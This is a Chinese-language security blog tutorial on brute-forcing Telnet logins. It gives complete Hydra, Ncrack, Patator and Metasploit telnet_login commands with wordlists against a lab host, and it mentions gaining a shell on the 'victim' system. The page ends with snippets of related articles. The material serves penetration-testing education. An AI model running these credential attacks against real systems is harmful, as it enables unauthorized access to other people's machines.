破解Telnet的四种方法

VSole2023-02-06 14:18:42

1. Hydra

Hydra 通常是首选工具。它可以对 50 多种协议执行快速字典攻击,包括 telnet、ftp、http、https、smb、多个数据库等等

现在,我们需要选择一个单词列表。与任何字典攻击一样,词表是关键。Kali 内置了许多单词表。

运行以下命令

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106 telnet
-L:表示用户名列表的路径
-P:表示密码列表的路径
如图所见,我们已成功获取 Telnet用户名xander和密码123。

2. Ncrack

Ncrack是一款高速网络认证破解工具。它旨在通过主动测试其所有主机和网络设备的密码错误来帮助公司保护其网络。

运行以下命令

ncrack -U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23
-U:表示用户名列表的路径
-P:表示密码列表的路径

如图所见,我们已成功获取 Telnet用户名xander和密码123。

3. Patator

Patator 是一个多用途的暴力破解工具,具有模块化设计和灵活的使用方式。它对于对 FTP、HTTP、SMB 等多个端口进行暴力攻击非常有用。

patator telnet_login host=192.168.1.106 inputs='FILE0FILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re='Username: | Password:'

从下面给出的图像中,可以观察到字典攻击的过程开始了,因此将获得受害者的用户名和密码。

4. Metasploit

该模块将在一系列机器上测试 telnet 登录并报告成功登录。如果已加载数据库插件并连接到数据库,此模块将记录成功的登录和主机,以便可以跟踪访问。

打开 Kali 终端类型 msfconsole 现在类型

use auxiliary/scanner/telnet/telnet_loginmsf exploit (telnet_login)>set rhosts 192.168.1.106 (远程主机IP)msf exploit (telnet_login)>set user_file /root/Desktop/user txtmsf exploit (telnet_login)>set pass_file /root/Desktop/pass.txtmsf exploit (telnet_login)>set stop_on_success truemsf exploit (telnet_login)> exploit
从下图可以看出,我们已经成功获取了 telnet 密码和用户名,此外,Metasploit 还提供了一个额外的好处,即提供远程系统命令 shell以未经授权访问受害者的系统。


用户名telnet
本作品采用《CC 协议》,转载必须注明作者和本文链接
破解Telnet的四种方法
2023-02-06 14:18:42
它可以对 50 多种协议执行快速字典攻击,包括 telnet、ftp、http、https、smb、多个数据库等等现在,我们需要选择一个单词列表。与任何字典攻击一样,词表是关键。Kali 内置了许多单词表。-L:表示用户名列表的路径-P:表示密码列表的路径如图所见,我们已成功获取 Telnet用户名xander和密码123。从下图可以看出,我们已经成功获取了 telnet 密码和用户名,此外,Metasploit 还提供了一个额外的好处,即提供远程系统命令 shell以未经授权访问受害者的系统。
通过文件搜索,可以定位到jhttpd。对于get请求则让httpd_dowith_get函数去处理。了解了该程序的http服务大概的流程,接下来就是分析哪个请求的处理存在问题即可。
会话认证支持 SSH 自动执行。支持 XModem、YModem 和 ZModem。集成本地文件管理器,支持移动到、复制到、删除、重命名、新建文件/目录等。
SSH协议通过对网络数据进行加密和验证,在不安全的网络环境中提供了安全的登录和其他安全网络服务。作为Telnet和其他不安全远程shell协议的安全替代方案,目前SSH协议已经被全世界广泛使用,大多数设备都支持SSH功能。用户认证SSH客户端向服务器端发起认证请求,服务器端对客户端进行认证。非对称加密的发送和接收需要使用一对关联的SSH密钥,公钥和私钥。
报告分析了一系列企业IT环境,基于开放端口和敏感协议暴露情况对网络安全状况进行基准测试。
SSH协议通过对网络数据进行加密和验证,在不安全的网络环境中提供了安全的登录和其他安全网络服务。作为Telnet和其他不安全远程shell协议的安全替代方案,目前SSH协议已经被全世界广泛使用,大多数设备都支持SSH功能。用户认证SSH客户端向服务器端发起认证请求,服务器端对客户端进行认证。非对称加密的发送和接收需要使用一对关联的SSH密钥,公钥和私钥。
0x10 前言对前一段时间发现的几个命令注入漏洞做下记录:CVE-2022-28571 && CVE-2022-28572 CVE-2022-28571 这个漏洞的产生是因为Telnetd参数过滤不完整导致的,由于需要知道密码所以比较鸡肋,类似于授权后的命令注入,发现的过程很有意思,这篇文章主要介绍这个漏洞。
◆含有passwd和pwd相关的文件中,可以看到嵌入式web服务httpd,部分htm文件以及其他配置文件。启动项中未见异常行为,httpd文件在firmwalker扫描的敏感信息和启动项中都有涉,因此需要用IDA分析一下该文件。通过IDA中字符串搜索发现疑似后门的敏感字符。根据此处的伪代码可推断出函数httpRpmConfAdd的功能是绑定URL和执行的函数。由函数名httpDebugInit可推断出这是一个调试后门。使用FirmAE来对固件进行模拟以验证上述内容。
hydra是著名组织thc的一款开源的暴力破解密码工具、功能非常强大kali下是默认安装的、几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大以及电脑的性能。Windows中Hydra安装:Hydra官方不支持Windows版,需要在GitHub上下载,地址为:https://github.com/maaaaz/thc-hydra-windows下载之后解压缩即可。-o file 指定结果输出文件-f 找到第一对登录名或者密码的时候中止破解。
VSole
网络安全专家